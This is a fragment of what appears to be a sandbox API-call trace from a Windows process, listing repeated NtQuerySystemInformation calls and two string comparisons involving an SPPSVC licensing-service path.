SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0284.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.081] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.093] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, 